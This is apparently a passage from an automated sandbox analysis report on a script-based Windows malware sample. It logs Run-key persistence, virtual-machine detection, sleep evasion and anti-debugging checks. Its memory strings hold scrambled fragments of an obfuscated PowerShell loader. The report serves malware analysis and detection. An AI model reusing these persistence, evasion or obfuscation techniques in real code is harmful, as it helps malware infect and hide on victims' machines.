              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD109AD push ecx; mov dword ptr [esp], ecx8_2_1FD109B6
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SocialpolitikkenJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SocialpolitikkenJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD4FE20 rdtsc 8_2_1FD4FE20
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5887Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3991Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8274Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1528Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 0.4 %
              Source: C:\Windows\System32\wscript.exe TID: 6584Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 796Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4348Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5752Thread sleep count: 201 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000003.1699749273.000001A1CB751000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\f%
              Source: wscript.exe, 00000000.00000003.1689587133.000001A1CB7D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1701567438.000001A1C9A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699851995.000001A1C9A23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699512618.000001A1CB7D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688560362.000001A1CB7D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1699405712.000001A1C9A1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1689172594.000001A1C9A23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700356068.000001A1CB7D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1700205313.000001A1C9A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1702028231.000001A1CB7D5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2022903763.0000000002B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000000.00000002.1702251638.000001A1CB969000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ilSubepE ,runSMedinQF.reiu ,aunEF erd=Sesq $Et.rngBlotlL Lno O rskebAggluASid oLHaema:FlyvekForklVTazeeA,nacttPassoOVorterDaubrIA sidaIridolManurGHjemmU DimiiG lbenDummyEFree aMe sin PlaneRed,rrInvesEUndersPra s+ Hier+ufred% S.de$ PostkFruenLU sepBTranse ,lanSA.uzzTCol,rrUp,eli Aarsmto,ullCrosseVaskenFangs1Efter1 S nd5Klamm. PiracSociaOVineyUJawb nPe,fet') ;$Enarration=$Klbestrimlen115[$Sibylesque]}$Magahi=313075
              Source: powershell.exe, 00000001.00000002.1890173276.000001F5FF940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp;%SystemRoot%\system32\mswsock.dllEnergibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl S
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD4FE20 rdtsc 8_2_1FD4FE20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04A0D6F8 LdrInitializeThunk,LdrInitializeThunk,3_2_04A0D6F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD0BFD0 mov eax, dword ptr fs:[00000030h]8_2_1FD0BFD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FD0EFD8 mov eax, dword ptr fs:[00000030h]8_2_1FD0EFD8
